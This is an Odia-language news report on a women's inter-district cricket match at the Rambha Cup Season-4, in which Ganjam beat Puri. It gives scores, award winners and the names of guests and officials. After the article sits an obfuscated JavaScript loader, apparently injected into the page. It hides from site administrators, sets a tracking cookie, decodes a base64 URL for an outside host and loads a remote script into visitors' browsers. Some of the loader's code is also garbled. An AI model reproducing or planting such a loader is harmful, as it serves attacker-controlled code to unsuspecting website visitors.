ରମ୍ଭା ତା ୦୨/୦୧/୨୦୨୬ ରମ୍ଭା ହାଇସ୍କୁଲ ମିନି ଷ୍ଟାଡିୟମରେ ରମ୍ଭା କପ୍ ସିଜନ-୪ ପକ୍ଷରୁ ଅନ୍ତଃରାଜ୍ୟ କ୍ରିକେଟ ଟୁର୍ଣ୍ଣାମେଣ୍ଟ ୧୧ତମ ଦିନରେ ଗଞ୍ଜାମ ମହିଳା କ୍ରିକେଟ ଆସୋସିଏସନ ସହ ପୁରୀ ମହିଳା କ୍ରିକେଟ ଆସୋସିଏସନ ମଧ୍ୟରେ ଖେଳ ଅନୁଷ୍ଠିତ ହୋଇଯାଇଛି l କାର୍ଯ୍ୟକ୍ରମରେ ମୁଖ୍ୟ ଅତିଥିଭାବେ ରମ୍ଭା ଏନ ଏ ସି କାର୍ଯ୍ୟନିର୍ବାହୀ ଅଧିକାରୀ ଆଶାଲତା ରଚମାଳାଙ୍କୁ ଉପଢୌକନ ଦେଇ ସମ୍ବର୍ଦ୍ଧନା କରାଯାଇଥିଲା l ତତ ସଙ୍ଗେ ମୁଖ୍ୟ ଅତିଥି ଗଞ୍ଜାମ ବ୍ଲକ ଅଧ୍ୟକ୍ଷା ଶର୍ମିଷ୍ଠା ପ୍ରଧାନ, ଅଧ୍ୟକ୍ଷା ପ୍ରତିନିଧି ସୁରଥ ପ୍ରାଧନ ଏବଂ ବିଧାୟକ ପ୍ରତିନିଧି ମାନସ ରଞ୍ଜନ ନାହାକଙ୍କୁ ଉପଢୌକନ ଦେଇ ସମ୍ବର୍ଦ୍ଧନା କରାଯାଇଥିଲା l ରମ୍ଭା କ୍ରିକେଟ କ୍ଲବ ସଭାପତି ସୀମାଞ୍ଚଳ ବାଡାତ୍ୟା, ସମ୍ପାଦକ ବିବେକାନନ୍ଦ ପଟ୍ଟନାୟକ, ଟୁର୍ନାମେଣ୍ଟ ସଂଗଠକ ସଭାପତି ଟି.ବାପୁଜୀ ସୁବୁଦ୍ଧି, ଏବଂ ପୁରୀର ଅଭିଭାବକ ପ୍ରମୁଖ ମଞ୍ଚାସିନ ରହିଥିଲେ l ଅନ୍ତଃରାଜ୍ୟ କ୍ରିକେଟ ଟୁର୍ଣ୍ଣାମେଣ୍ଟର ୧୧ମ ଦିନରେ ପ୍ରଥମ ଇନିନ୍ସରେ ପୁରୀ ଟସ୍ ଜିତି ବେଟିଂ ର ନିଷ୍ପତି ନେଇଥିଲେ l
ନିର୍ଦ୍ଧାରିତ ୨୦ ଓଭର ରେ ୬ ଗୋଟି ଉଇକେଟ ବିନିମୟରେ ୧୨୨ ରନ ସଂଗୃହିତ କରିଥିଲେ l ପୁରୀ ଦଳ ପକ୍ଷରୁ ଅଧିନାୟିକା ସାଲିନି ଦାଶ ସର୍ବାଧିକ ୪୦ ଗୋଟି ବଲରେ ୪୩ ରନ ସଂଗୃହିତ କରି ବେଷ୍ଟ ବେଟସ ମେନ ଘୋଷିତ ହୋଇଥିଲେ l ଜବାବରେ ଗଞ୍ଜାମ କ୍ରିକେଟ ଆସୋସିଏସନ ଅଧିନାୟିକା ଜୁଲି ବେହେରା ୬ ଗୋଟି ବଲ ହାତରେ ରଖି ୬ ଗୋଟି ଉଇକେଟ ବିନିମୟରେ ସହଜ ବିଜୟ ହାସଲ କରିଥିଲେ l ଗଞ୍ଜାମ ଦଳ ତରଫରୁ ମିନତୀ ବେହେରା ୪୩ ଗୋଟି ବଲରେ ୩୯ରନ ସଂଗୃହିତ କରି ମେନ ଅଫ ମେଚ ଘୋଷିତ ହୋଇଥିଲେ l ମୁଖ୍ୟ ଅତିଥି ଅଧ୍ୟକ୍ଷା ଶର୍ମିଷ୍ଠା ପ୍ରଧାନ ମେନ ଅଫ ଦି ମେଚ ମିନତୀ ବେହେରାଙ୍କୁ ଟ୍ରଫି ପୁରସ୍କାର ପ୍ରଦାନ କରିଥିଲେ ଲାଲ ଭାଷ୍ୟକାର ସନ୍ତୋଷ କୁମାର ନାହାକ ଓ ଶ୍ରୀକାନ୍ତ ନାୟକ ଧାରା ବିବରଣୀ ପ୍ରଦାନ କରିଥିଲେ l ସ୍କୋରର ଶୁଭଙ୍କର ପଣ୍ଡା ଓ ସଚିନ କୁମାର ଗୌଡ଼ କରିଥିବା ବେଳେ ଏମ୍ପାୟାର ହିମାଂଶୁ ବୈଠାରୁ ଓ ମହେଶ୍ୱର ନାୟକ ରହିଥିଲେ l ରମ୍ଭା କ୍ରିକେଟ କ୍ଳବର ସମସ୍ତ ସଦସ୍ୟ ହାପି, ଗୁପ୍ତ, ଭବାନୀ, ସିଲୁ, ସୌମ୍ୟ, ଚିକୁ, କୃଷ୍ଣ, ବିକି, ଦୁଷ୍ମନ୍ତ, ଉମା, ସଚିନ, ଓ ସଦସ୍ୟା ଜୁଲି, ମଲି, ଇତି, ଝରଣା, ପ୍ରମୁଖ ସହଯୋଗ କରିଥିଲେ l
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

